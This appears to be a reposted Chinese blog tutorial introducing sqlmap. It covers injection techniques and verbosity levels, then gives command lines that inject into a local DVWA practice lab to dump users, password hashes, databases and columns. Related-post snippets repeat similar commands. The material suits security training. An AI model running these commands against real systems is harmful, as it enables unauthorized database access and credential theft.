sqlmap快速上手教程

最新推荐文章于 2024-07-15 15:39:35 发布
最新推荐文章于 2024-07-15 15:39:35 发布
阅读量313 收藏
点赞数
文章标签: 数据库 python
原文链接:https://my.oschina.net/u/856051/blog/2354238
版权

为什么80%的码农都做不了架构师?>>>   hot3.png

Sqlmap 是一种开源的渗透测试工具,可以自动检测和利用 Sql 注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令,使用 Sqlmap 工具将极大的简化我们的测试工作量。

Sqlmap 是一个自动化的 SQL 注入工具,其主要功能是扫描、发现并利用给定的 Url 的 Sql 注入漏洞,目前支持 MySQL、 Oracle、 PostgreSQL、 Microsoft SQL Server、 Microsoft Access 等主流数据库。 Sqlmap 使用 5 种 SQL 注入技术(不加参数默认测试所有注入技术):

  • 基于布尔的盲注,即可以根据返回页面判断条件真假的注入。

  • 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。

  • 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。

  • 联合查询注入,可以使用union的情况下的注入。

  • 堆查询注入,可以同时执行多条语句的执行时的注入。

当你使用 Sqlmap 对一个注入点是进行了测试时,可以使用 -v x参数指定回显信息的复杂度,x属于[0~6]:

共有 7 个等级,默认为 1:

等级解释
- 0只显示python错误以及严重的信息。
- 1同时显示基本信息和警告信息。(默认)
- 2同时显示debug信息。
- 3同时显示注入的payload。
- 4同时显示HTTP请求。
- 5同时显示HTTP响应头。
- 6同时显示HTTP响应页面

 sqlmap 本地实验可以 本地部署渗透测试靶场:dvwa

当你使用 Sqlmap 对一个注入点是进行了测试时,可以使用 -v x参数指定回显信息的复杂度,x属于[0~6]:

共有 7 个等级,默认为 1:

等级解释
- 0只显示python错误以及严重的信息。
- 1同时显示基本信息和警告信息。(默认)
- 2同时显示debug信息。
- 3同时显示注入的payload。
- 4同时显示HTTP请求。
- 5同时显示HTTP响应头。
- 6

同时显示HTTP响应页面

 

 获取服务器情况:

python sqlmap.py -u "localhost/html/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=vnua5n6lp5gh66sjrn908d4nd1" #注意参数必须使用双引号括起来

获取当前数据库和用户密码:

python sqlmap.py -u "localhost/html/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=vnua5n6lp5gh66sjrn908d4nd1" -b --current-user --current-db

python sqlmap.py -u "localhost/html/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=vnua5n6lp5gh66sjrn908d4nd1" --users --password

用默认字典表把数据库密码跑出来,如果跑不出来,就是哈希值了。

获取所有数据库名,表名,字段名;

python sqlmap.py -u "localhost/html/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=vnua5n6lp5gh66sjrn908d4nd1" --users --password

python sqlmap.py -u "localhost/html/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=vnua5n6lp5gh66sjrn908d4nd1" --users --password

python sqlmap.py -u "localhost/html/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=vnua5n6lp5gh66sjrn908d4nd1" -D "dvwa" -T "users" --columns

转载于:https://my.oschina.net/u/856051/blog/2354238

weixin_34138377
关注
DVWA-SQL注入(sqlmap安装和使用)
m0_64037702的博客
07-12 1097
链接:https://pan.baidu.com/s/1-kQgGgzwAJlIbA6hPbvv9Q 提取码:8eqw 双击安装包进行安装 新建一个文件夹选择安装至这个文件夹 我的电脑找到 属性 点击高级系统设置 出现 “系统属性" , 点击环境变量 出现“环境变量” 在下面的“系统变量”里面找到 Path 变量点击编辑(没有找到的话点击新建) 在变量值那里末尾,填上你的Python安装路径 在path中添加自己python的安装路径就行了 Win+R打开cmd输入python出现这个页面表示安装成功
使用Sqlmap对dvwa进行sql注入测试(初级阶段)
fanxindong0620的博客
11-07 3406
0.测试准备 1)打开Kali虚拟机终端; 2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入的测试页面 1.获取DVWA的url和cookie 在输入框中输入1,显示有内容,此时利用此URL进行SQL注入。 输入document.cookie获取页面的cookie。去除remem_token字段的内容,用于下文的sql注入终...
sqlmap对dvwa进行sql注入
weixin_52971422的博客
04-01 4759
渗透环境:dvwa 攻击机:kali 注入点 测试 在kali使用sqlmap,添加cooki来注入 sqlmap -u "http://192.168.17.152/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=24d706127dc1260818eadf1641c43547" --dbs 成功 继续查询数据库的表 sqlmap -u "http://1
SQLMAP教程,零基础入门到精通,一篇就够了!
最新发布
程序员阿飘 的博客
07-15 1564
这些选项可以用来创建用户自定义函数`--udf-inject 注入用户自定义函数`` ` `--shared-lib=SHLIB 共享库的本地路径`
Sqlmap
mumuzi2的博客
02-25 399
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
sqlmap安装包及教程.zip
12-23
在这个"sqlmap安装包及教程.zip"压缩文件中,包含了SQLMap的安装程序和后续配置的教程,这将有助于用户快速上手和熟练使用这款工具。 首先,让我们深入了解SQLMap的基本概念。SQL注入是一种常见的网络安全威胁,...
sqlmap中文手册-sql注入自动化测试工具
07-19
SQLMap的操作相对简单,即使对于初学者来说,也能通过其详尽的用户手册快速上手。除了阅读中文版的手册,结合sqli-labs这样的实验平台进行实践操作也是学习的有效方法。用户手册不仅介绍了工具的基本概念和技术原理...
sqlmapproject-sqlmap-1.1.5-4-gee5b5cd.zip
05-24
6. **示例**:演示如何使用SQLMap的例子,可以帮助新手快速上手。 7. **许可证文件**:说明软件的使用许可和版权信息,通常遵循开源协议如GPL。 8. **README**:简要介绍SQLMap,安装和使用指南。 9. **CHANGELOG**...
sqlmapproject-sqlmap-1.3.12-27-g9ca5dc7.tar.gz
01-13
10. **教程与文档**:项目通常会提供详尽的文档和教程,帮助用户快速上手和理解工具的使用方法。 要使用这个压缩包,你需要先在Linux环境下解压,然后根据提供的源代码编译安装,或者如果包含预编译的二进制文件,...
SQLmap-SQL注入
03-12
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
DVWA——SQL注入——sqlmap实现
weixin_46709219的博客
11-14 1350
网络安全-sqlmap学习笔记 sqlmap上面的总连接
DVWA SQL Injection 利用SQLMap注入
Senimo
03-18 760
DVWA SQL Injection 利用SQLMap注入LowMediumHigh Low 输入1,提交后得到回显: 发现是GET传参: http://xxx/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# 直接携带Cookie后使用SQLMap注入即可: sqlmap -u "http://xxx/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low
SQLMap 注入 DVWA实战
Cobra的博客
12-16 3033
一、low级别 1、进入dvwa界面输入1,点击Submit,得到链接 http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit# 2、我们用sqlmap进行爆破 sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" 我们可以看到需要跳转到login的页面,所以,认为这里.
使用SQLMAP学习DVWA-SQL Injection(SQL注入)
weixin_43838889的博客
04-28 588
SQLMAP 是知名的自动化SQL注入和数据库工具,需要Python环境运行。 本文参考SQLMAP详解 向博主致谢 浏览器F12进入开发者调试界面,将Request Headers部分全部复制保存成dvwa_sqli_low.txt文件。 ##Low 执行sqlmap.py -r dvwa_sqli_low.txt, -r REQUESTFILE Load HTTP request from a file 从文件加载HTTP请求 D:
初使用sqlmap对dvwa进行sql注入
anma5413的博客
12-21 858
1.下载安装dvwa,可以去此处下载:http://www.dvwa.co.uk/ 2.需要安装python运行环境,我使用的是python2.7,python2.7-3.0之间的应该都可以。 3.下载sqlmap包并将其解压 4.直接cmd运行sqlmap,输入sqlmap.py -h查看帮助信息 我在运行sqlmap的时候遇到了这么一个问题,就是输入sqlmap.py -[o...
漏洞防范:搭建漏洞靶场DVWA,DVWA之SQL注入漏洞,利用sqlmap把复杂的程序自动化
weixin_52371314的博客
10-12 1937
sql注入漏洞
DVWA练习记录--使用sqlmap实现SQL注入
weixin_63095349的博客
09-05 278
利用sqlmap注入
iBATIS入门教程快速上手与XML配置详解
iBATIS简易教程是一份针对有一定基础的开发者的教学资料,着重讲解了iBATIS 2.0版本的使用方法和配置。iBATIS是Apache的一个开源框架,用于将Java对象与数据库交互简化,特别是通过SQL Maps功能实现数据访问。 **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值